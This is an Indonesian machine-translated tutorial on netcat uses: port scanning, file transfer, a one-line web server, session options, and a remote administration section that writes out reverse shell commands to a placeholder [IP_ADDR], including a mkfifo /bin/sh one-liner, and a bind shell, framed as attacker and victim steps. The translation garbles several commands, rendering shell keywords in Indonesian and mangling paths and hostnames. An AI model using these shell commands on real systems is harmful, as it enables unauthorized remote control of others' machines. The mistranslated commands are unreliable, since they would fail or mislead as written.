Phenquestions
Perbedaan singkat antara netcat-traditional dan netcat-openbsd
Ada dua paket serupa yang tersedia untuk netcat dengan sedikit perbedaan di antara keduanya.
netcat-tradisional menyertakan opsi '-e' tambahan yang dapat digunakan untuk mengikat program (i.e bash) dengan netcat. Fitur ini sangat berguna untuk keperluan administrasi jarak jauh.
netcat-openbsd memiliki beberapa dukungan tambahan untuk IPv6 dan proxy.
Instalasi Netcat
Meskipun netcat sudah diinstal sebelumnya di sebagian besar distribusi Linux tetapi jika tidak, itu dapat diinstal dengan mudah menggunakan perintah berikut:.
Untuk paket tradisional,
[dilindungi email]:~$ Sudo apt-get install netcat-traditionalUntuk versi openbsd,
[dilindungi email]:~$ sudo apt-get install netcat-openbsdNetcat untuk Windows dapat diunduh dari sini https://sourceforge.net/proyek/nc110/file/.
Sekarang kita akan menjelajahi beberapa kasus penggunaan yang menarik dari netcat
Pemindaian Port menggunakan netcat
Untuk memindai port yang terbuka, gunakan opsi '-z'. Netcat akan mencoba terhubung ke setiap port tanpa mengirim data apa pun atau data yang sangat terbatas dalam kasus UDP. Ketik berikut ini
[dilindungi email]:~$ nc -z -v hackme.organisasi 80… gunting…
hack saya.organisasi [217.78.1.155] 80 (http) buka
Untuk memindai berbagai port, ketik
[dilindungi email]:~$ nc -z -nv 192.168.100.72 20-80(TIDAK DIKETAHUI) [192.168.100.72] 80 (http) buka
(TIDAK DIKETAHUI) [192.168.100.72] 22 (ssh) buka
Transfer File dengan netcat
Kasus penggunaan netcat lainnya yang berguna adalah transfer file antar komputer jarak jauh. Anda dapat mengirim teks dan file biner dari satu PC ke PC lain. Kami akan mencoba mengirim file "file".pdf” dari PC Linux ke PC Windows [IP 192.168.100.72] menggunakan netcat sebagai contoh.
Pada mesin Windows (penerima), ketik berikut ini
C:\Users> nc -nvlp 1337 > file.pdfMendengarkan di [0.0.0.0] (keluarga 2, port 1337)
Pada mesin Linux (pengirim), ketik berikut ini
[dilindungi email]:~$ nc -nv 192.168.100.72 1337 < file.pdfKoneksi ke 192.168.100.72 1337 port [tcp/*] berhasil!
Administrasi Jarak Jauh dengan netcat
Salah satu kasus penggunaan terbaik netcat adalah administrasi jarak jauh, yang berarti Anda dapat mengontrol PC orang lain menggunakan netcat. Netcat-traditional hadir dengan opsi '-e' yang dapat digunakan untuk mengikat program (mis.e cmd.exe di Windows atau bash di Linux) dengan port, itu berarti netcat akan bertindak sebagai komunikator antara program dan PC jarak jauh. Netcat akan menerima perintah dari PC jarak jauh, dijalankan di sistem lokal dan akan mengirimkan hasilnya kembali ke PC jarak jauh. Fitur ini banyak digunakan untuk tujuan jahat, untuk menjaga pintu belakang di PC dan server. Fitur ini hanya tersedia di netcat-traditional tetapi dengan sedikit trik, netcat-openbsd juga dapat digunakan untuk tujuan yang sama. Anda dapat menggunakan dua cara untuk mengontrol PC orang lain.
Di sebuah Cangkang Terbalik koneksi, penyerang mendengarkan port dan menunggu koneksi dikirim dari mesin korban. Ini digunakan ketika komputer korban berada di belakang NAT atau tidak memiliki IP publik.
Untuk mendapatkan shell terbalik menggunakan netcat, Anda perlu mendengarkan di port menggunakan netcat. Ketik yang berikut di mesin penyerang attacker,
[dilindungi email]:~$ nc -nvlp 1337Mendengarkan di [0.0.0.0] (keluarga 2, port 1337)
Pada mesin korban (jika netcat-tradisional dipasang)
//ganti “/bin/bash” dengan “cmd.exe” untuk Windows
[dilindungi email]:~$ nc -nv [IP_ADDR] 1337 -e /bin/bashUntuk netcat-openbsd (di mana opsi "-e" tidak didukung)
[dilindungi email]:~$ rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc [IP_ADDR] 1337 >/tmp/f
Sementara di Mengikat Shell koneksi, penyerang mengikat port pada mesin korban dan menghubungkan ke port itu menggunakan soket klien. Ini digunakan ketika mesin penyerang berada di belakang NAT atau tidak memiliki IP publik.
Pada mesin korban, ketik
[dilindungi email]:~$ nc -nlvp 1337 -e /bin/bashmendengarkan di [apa saja] 1337…
Sekarang, untuk menjalankan perintah pada mesin korban, ketik
[dilindungi email]:~$ nc -nv 127.0.0.1 1337Koneksi ke 127.0.0.1 1337 port [tcp/*] berhasil!
$ id
uid=1000(azad) gid=1000(azad) grup=1000(azad),4(adm),24(cdrom),27(sudo),
30(dip),46(plugdev),118(lpadmin),129(sambashare)
Server Web Sederhana menggunakan netcat
Anda juga dapat melakukan trik sederhana lainnya untuk menggunakan netcat sebagai server web satu halaman minimal. Server web ini akan sangat sederhana tanpa konfigurasi khusus, dan kami akan menggunakannya untuk mengirim kode HTML kami ke browser.
[dilindungi email]:~$ sementara true ; lakukan echo -e "HTTP/1.1 200 Oke\n\n $(gema "
Server Web Sederhana saya menggunakan netcat
")" | nc -nvlp 1337 ; selesaiMendengarkan di [0.0.0.0] (keluarga 2, port 1337)
Sekarang, coba ambil halaman web menggunakan curl
[dilindungi email]:~$ curl http://127.0.0.1:1337/Server Web Sederhana saya menggunakan netcat
Tentukan Batas Waktu untuk Sesi netcat
Anda dapat menentukan batas waktu untuk sesi netcat menggunakan opsi "-w". Netcat akan secara otomatis memutuskan sesinya setelah waktu yang ditentukan habis.
// -w [Waktu dalam Detik][dilindungi email]:~$ nc -w 40 -nvlp 1337
Mendengarkan di [0.0.0.0] (keluarga 2, port 1234)
Lanjutkan Mendengarkan bahkan jika Klien menutup Koneksi
Dalam mode normal, server netcat dimatikan dan berhenti mendengarkan port ketika klien menutup koneksi. Anda dapat menjaga server tetap menggunakan opsi "-k"
[dilindungi email]:~$ nc -k -nlvp 1234Mendengarkan di [0.0.0.0] (keluarga 2, port 1234)
Kesimpulan
Netcat adalah utilitas sederhana namun efisien yang dapat digunakan untuk banyak tugas sehari-hari yang sederhana. Itu datang pra-instal di hampir setiap UNIX seperti sistem operasi dan dapat digunakan untuk berbagai tugas seperti komunikasi antara dua PC, transfer file dan banyak lagi.
